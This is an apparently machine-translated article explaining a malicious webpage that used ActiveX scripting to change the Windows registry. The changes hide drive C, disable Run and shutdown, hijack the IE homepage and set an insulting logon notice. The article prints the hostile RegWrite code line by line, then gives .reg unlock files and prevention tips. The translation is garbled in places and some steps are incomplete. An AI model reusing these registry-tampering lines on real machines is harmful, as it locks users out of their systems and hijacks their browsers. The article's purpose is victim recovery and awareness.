Fans of modifying the webpage registry and Solutions

Will the Registry be modified when you browse the Web page? Sure! If you have browsed the following webpage: http: // www. XX. com/default.htm, you may feel worse!

When you enter this page:

1. Modify the Start Menu

1) Disable "Shut down the system"
2) Disable "running"
3) "deregister" is prohibited"

2. Hide drive C-your drive C cannot be found

3. forbidden to use Registry Editor regedit

4. Dos prohibitedProgram

5. Make the system unable to enter the "real mode"

6. Do not run any program

7. Change the homepage of IE browser to http: // www. XX. com/, which is also added to the favorites folder.

How are these functions achieved? Originally, this webpage was produced by someone using Java technology and contains harmful content.CodeActiveX webpage file. To let more people know about its hazards, I checked itsSource codeIn the left-side navigation pane ).

Note: The following code changes the default homepage of your IE connection to http: // www. XX. com/
SHL. regwrite ("hkcu \ Software \ Microsoft \ Internet Explorer \ main \\
Start page "," http: // www. XX. com /");

Note: The following are the methods used to modify the victim's registry key on the webpage.

SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion
\ Policies \ Explorer \ norun ", 01," REG_BINARY ");
Note: The victim system does not have a "run" item, so that the user cannot modify the harmful webpage to the system registry through the Registry Editor.

SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \\
Policies \ Explorer \ noclose ", 01," REG_BINARY ");
Note: make the victim system unavailable.

SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \\
Policies \ Explorer \ nologoff ", 01," REG_BINARY ");
Note: The victim system does not have a "deregister" item

SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \\
Policies \ Explorer \ nodrives "," 00000004 "," REG_DWORD ");
Note: make the victim system have no logical drive C

SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \\
Policies \ winoldapp \ disabled "," REG_BINARY ");
Note: Do not run all DoS applications;

SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \\
Policies \ winoldapp \ norealmode "," REG_BINARY ");
Note: The system cannot be started in "real mode" (traditional DOS mode;

Note: When you log on to the web page, it also modifies the following registry key so that a logon window is displayed during Windows logon (before Microsoft network user logon)

SHL. regwrite ("HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \\
Winlogon \ legalnoticecaption "," ...");
Note: These codes will make the window title "Oh la ..."

SHL. regwrite ("HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \\
Winlogon \ legalnoticetext "," Welcome! You are an incredible idiot! The story "Oh la..." begins, and enters the miserable world as determined ");
Note: The above line shows the text in the window.

Note: The following two lines of code modify the registry so that all the IE Windows of the victim are added with the following title: "Oh la ..."

SHL. regwrite ("HKLM \ Software \ Microsoft \ Internet Explorer \ main \\
Window title "," ...");
SHL. regwrite ("hkcu \ Software \ Microsoft \ Internet Explorer \ main \\
Window title "," ...");
Note: All modifications to the victim's Registry have been completed until the above line is reached!

Note: The following code is used to add a webpage to the victim's favorites.

VaR WF, Shor, Loc;
WF = FSO. getspecialfolder (0 );
Loc = WF + "\ favorites ";
If (! FSO. folderexists (LOC ))
{
Loc = FSO. getdrivename (WF) + "\ Documents and Settings \\
"+ Net. username +" \ favorites ";
If (! FSO. folderexists (LOC ))
{
Return;
}
}

Note: The following is the code used to add a webpage to your favorites.
Addfavlnk (LOC, "Find the feeling www. XX. com", "http: // www. XX. com ");

Because the code is very simple and comments are added, I believe you have understood what is going on. What should I do if I accidentally access the webpage and have already been recruited? Don't worry. The solution is listed below.

Solution for victim users:

1: For Win9x users, it is recommended to press F8 when the computer is started, select to MS-DOS mode, use scanreg/restore command to restore the previous backup, normal registry.

2: For Win2000 users, copy the following content and save it as unlock. reg file, optional security mode with command line, use the command Regedit unlock. reg import, how to restart the machine is OK.

The content of the unlock. reg file is as follows:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \
Policies \ Explorer]
"NoDriveTypeAutoRun" = DWORD: 00000095
"Norun" = HEX:
"Nologoff" = HEX:
"Nodrives" = DWORD: 00000000
"Restrictrun" = DWORD: 00000000

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \
Policies \ System]
"Disableregistrytools" = DWORD: 00000000

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \
Policies \ System]
"Disableregistrytools" = DWORD: 00000000

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \
Policies \ winoldapp]
"Disabled" = DWORD: 00000000

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \
Policies \ winoldapp]
"Norealmode" = DWORD: 00000000

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \
Winlogon]
"Legalnoticecaption" = ""
"Legalnoticetext" = ""

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ main]
"Window title" = "IE browser"

[HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ main]
"Window title" = "IE browser"

Preventive measures:

1. To avoid making moves, do not easily go to websites you do not know.

2. Disable ActiveX plug-ins, controls, and Java scripts in iesettings.

3. You can upgrade to the latest virus database to prevent attacks against such malicious web pages.

4. Since the webpage destroys our system by modifying the registry, we can lock the Registry in advance to prevent modification. What should I do if I want to use the registration table editor regedit.exe? Therefore, we need to prepare a "key" in advance to open this "Lock "!

The locking method is as follows:

(1.exe run the registration table editor regedit.exe;
(2) Expand the Registry to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \
Policies \ Users.

The unlock method is as follows:

Use NotePad to edit a. reg file with any name, such as unlock. Reg. The content is as follows:

Regedit4

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \
Policies \ System]
"Disableregistrytools" = DWORD: 00000000

Storage disk. You have an unlocked key! To use the Registry Editor, double-click unlock. Reg. Note that there must be a blank line after "regedit4", and there must be no space between "4" and "T" in "regedit4"; otherwise, the previous achievements will be abandoned!

NOTE: For the damage caused by malicious code on the web page of "Wan Hua Gu", you can also prevent the damage by following the methods mentioned above. You can also refer to the above method to solve the problem after the move. In addition, kv3000 can completely restore the "Wan Hua Gu" and cannot safely recover the web page damage system phenomenon described in this article.